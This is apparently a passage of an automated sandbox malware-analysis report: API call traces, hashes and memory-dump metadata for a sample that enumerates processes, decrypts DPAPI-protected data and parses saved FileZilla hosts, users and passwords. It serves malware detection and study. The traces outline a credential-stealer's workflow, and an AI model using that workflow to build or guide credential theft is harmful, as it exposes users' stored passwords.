                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  • API String ID: 3657800372-0
                                  • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                  • Instruction ID: ec186dc502c88c98e3638293fff085d95328f9e4ca1f8ca95b137b7d6c986ae9
                                  • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                  • Instruction Fuzzy Hash: 900100B5A80208BBEB10DFD4DD45F9E77B9EB44704F104159FB05BA2C0D674AA018B66
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 022F9885
                                  • Process32First.KERNEL32(00420ACA,00000128), ref: 022F9899
                                  • Process32Next.KERNEL32(00420ACA,00000128), ref: 022F98AE
                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 022F98C3
                                  • CloseHandle.KERNEL32(00420ACA), ref: 022F98E1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 420147892-0
                                  • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                  • Instruction ID: a4468b1a8db77ef6ba41993f3c9aab8bf6032606c7d1dabf9a8951829bf86d50
                                  • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                  • Instruction Fuzzy Hash: BB010C79A60208FFDB60DFE4CD54BEDB7F9EF49700F004199A506A6244D7749A84CF51
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041961E
                                  • Process32First.KERNEL32(00420ACA,00000128), ref: 00419632
                                  • Process32Next.KERNEL32(00420ACA,00000128), ref: 00419647
                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 0041965C
                                  • CloseHandle.KERNEL32(00420ACA), ref: 0041967A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 420147892-0
                                  • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                  • Instruction ID: 11d567adce4b572477f284a2ec541547db87c4b6fd8ba8cb36d7f0fd64301d48
                                  • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                  • Instruction Fuzzy Hash: F201E9B9A40208ABCB24DFA5C958BEEB7F9EB49700F104189E90996250D7389F81CF61
                                  APIs
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                    • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                    • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214F0,00420D73), ref: 022EE709
                                  • StrCmpCA.SHLWAPI(?,004214F8), ref: 022EE759
                                  • StrCmpCA.SHLWAPI(?,004214FC), ref: 022EE76F
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 022EEE46
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                  • String ID:
                                  • API String ID: 433455689-0
                                  • Opcode ID: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                  • Instruction ID: d2484f52ba7a2c3e5aa87b654957175244c4dfe37349d949c1ce3eb7e6c39a22
                                  • Opcode Fuzzy Hash: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                  • Instruction Fuzzy Hash: 1812FA71A203189BDB58FBA4DDA5EEDB37AAF54300F4041B9A60E52198EF345F88CF51
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(00000000,022E53EB,40000001,00000000,00000000,?,022E53EB), ref: 022F9127
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptString
                                  • String ID:
                                  • API String ID: 80407269-0
                                  • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                  • Instruction ID: 2550f52006e8f2b83976578b9a03c54a2d1ad19c17d673727e77d486c509de24
                                  • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                  • Instruction Fuzzy Hash: 5B111F74214205BFDB40CF94DC98FA773AAAF89740F009578FA098B264D775E881DB60
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(00000000,00405184,40000001,00000000,00000000,?,00405184), ref: 00418EC0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptString
                                  • String ID:
                                  • API String ID: 80407269-0
                                  • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                  • Instruction ID: 3c4cb89ba01459054e3b3595e947631781f59a96386c3a2a773972b879479806
                                  • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                  • Instruction Fuzzy Hash: 62111C74200204BFDB00CFA4D884FA733AAAF89304F109549F9198B250DB39EC82DB65
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022E5155,00000000,00000000), ref: 022E9D56
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,022E5155,00000000,?), ref: 022E9D68
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022E5155,00000000,00000000), ref: 022E9D91
                                  • LocalFree.KERNEL32(?,?,?,?,022E5155,00000000,?), ref: 022E9DA6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID:
                                  • API String ID: 4291131564-0
                                  • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                  • Instruction ID: 963b71b57383a2556b51831be05b983c99cd137e100eaf3de134f3754485e773
                                  • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                  • Instruction Fuzzy Hash: 1711A4B4240208BFEB10CFA4CC95FAA77B5EB89704F208059FD159B394C776A941CB90
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 022E9DEB
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 022E9E0A
                                  • memcpy.MSVCRT(?,?,?), ref: 022E9E2D
                                  • LocalFree.KERNEL32(?), ref: 022E9E3A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                  • String ID:
                                  • API String ID: 3243516280-0
                                  • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                  • Instruction ID: f48408bfef89aa8dd0a135fe1a204d7657bd1f91c845ba2acd1cfad65f451b00
                                  • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                  • Instruction Fuzzy Hash: 021109B8A00209EFDB04DFA8D985AAEB7B9FF89304F104559F915A7350D730AE50CFA1
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                  • memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                  • LocalFree.KERNEL32(?), ref: 00409BD3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                  • String ID:
                                  • API String ID: 3243516280-0
                                  • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                  • Instruction ID: 8471c3d920f6d21a6ca128c50317bdd839bed9d1cf50ed0ddd6ab59e3c77a746
                                  • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                  • Instruction Fuzzy Hash: 46110CB8A00209EFDB04DF94D985AAE77B6FF89300F104569F915A7390D774AE10CF61
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0088AA80,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00417A63
                                  • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,0088AA80,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A6A
                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0088AA80,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A7D
                                  • wsprintfA.USER32 ref: 00417AB7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                  • String ID:
                                  • API String ID: 362916592-0
                                  • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                  • Instruction ID: 8af700d3b0e32b47e9d6ddd9198ddf9a5cfc8e3ba9127fd648bfb7377b14e362
                                  • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                  • Instruction Fuzzy Hash: 461152B1A45228EFEB108B54DC45F9AB7B8FB05711F10439AE516932C0D7785A40CF55
                                  APIs
                                  • CoCreateInstance.COMBASE(0041E118,00000000,00000001,0041E108,00000000), ref: 00413758
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004137B0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWide
                                  • String ID:
                                  • API String ID: 123533781-0
                                  • Opcode ID: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                  • Instruction ID: 95f6a265596bdc049295610fa53daf8ef9ce5e7415083cbf30a8e52d2e28a0c3
                                  • Opcode Fuzzy Hash: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                  • Instruction Fuzzy Hash: A941F474A40A28AFDB24DF58CC94BDAB7B5BB48306F4041D9A608A72D0E771AEC5CF50
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: .$GetProcAddress.$l
                                  • API String ID: 0-2784972518
                                  • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                  • Instruction ID: 729509d9cad45209f4adc6cfc72b6d5237bdc4143424d61a88d679ce3ad6bd9c
                                  • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                  • Instruction Fuzzy Hash: B43169B6910609CFDB20CF99C880AAEBBF5FF18724F54404AD442B7314D7B1EA45CBA4
                                  APIs
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                    • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                    • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 022EF985
                                  • StrCmpCA.SHLWAPI(?,004215BC), ref: 022EF9D6
                                  • StrCmpCA.SHLWAPI(?,004215C0), ref: 022EF9EC
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 022EFD18
                                  • FindClose.KERNEL32(000000FF), ref: 022EFD2A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 3334442632-0
                                  • Opcode ID: dbc33d9263c12bccf2023e6a26364f15308e1a9a0f3d34f169b2ef739c1ce31c
                                  • Instruction ID: 5ffafe99b1c26a64b92a10fdfac79120001bddd4b96ffc411f997a5b06042896
                                  • Opcode Fuzzy Hash: dbc33d9263c12bccf2023e6a26364f15308e1a9a0f3d34f169b2ef739c1ce31c
                                  • Instruction Fuzzy Hash: B311B43182030CABCB68EBE0DD649EDB336AF20300F4042BA960E56195EF341B49CF41
                                  APIs
                                  • SetUnhandledExceptionFilter.KERNEL32(0041CEA8), ref: 022FD156
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled
                                  • String ID:
                                  • API String ID: 3192549508-0
                                  • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                  • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                                  • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                  • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                                  APIs
                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0001CEA8), ref: 0041CEEF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled
                                  • String ID:
                                  • API String ID: 3192549508-0
                                  • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                  • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                                  • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                  • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342767053.000000000085A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0085A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_85a000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                  • Instruction ID: 4c27621c21ab260302db29f998522f6e5be78953b9059d03e825429357bfbb10
                                  • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                  • Instruction Fuzzy Hash: B81182723401009FD744DF99DCC5EA673EAFB89361B298165EE04CB312D6B5EC41C765
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                  • Instruction ID: bf5abefc6b6423cf7346c2d27ca77ede209e7abe5332df108e0fd2707080945d
                                  • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                  • Instruction Fuzzy Hash: 7001AC766205058FDF21DF64C804FAE33E9EB86315F8944B5E907E7245D7B4A6428F90
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: free
                                  • String ID:
                                  • API String ID: 1294909896-0
                                  • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                  • Instruction ID: 4469cbce40bc13bee26ef3afcc501b4ee9c0e37d309943ca325b37e2282ed316
                                  • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                  • Instruction Fuzzy Hash: 9471C132471B40DBD7E63BB1DF01E4AFAA37F04702F104934BADF295749E2268659E51
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                  • strtok_s.MSVCRT ref: 0041031B
                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00410362
                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410369
                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00410385
                                  • lstrlenA.KERNEL32(00000000), ref: 00410393
                                    • Part of subcall function 004188E0: malloc.MSVCRT ref: 004188E8
                                    • Part of subcall function 004188E0: strncpy.MSVCRT ref: 00418903
                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 004103CF
                                  • lstrlenA.KERNEL32(00000000), ref: 004103DD
                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00410419
                                  • lstrlenA.KERNEL32(00000000), ref: 00410427
                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00410463
                                  • lstrlenA.KERNEL32(00000000), ref: 00410475
                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410502
                                  • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041051A
                                  • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410532
                                  • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041054A
                                  • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00410562
                                  • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00410571
                                  • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00410580
                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410593
                                  • lstrcatA.KERNEL32(?,00421678,?,?,00000000), ref: 004105A2
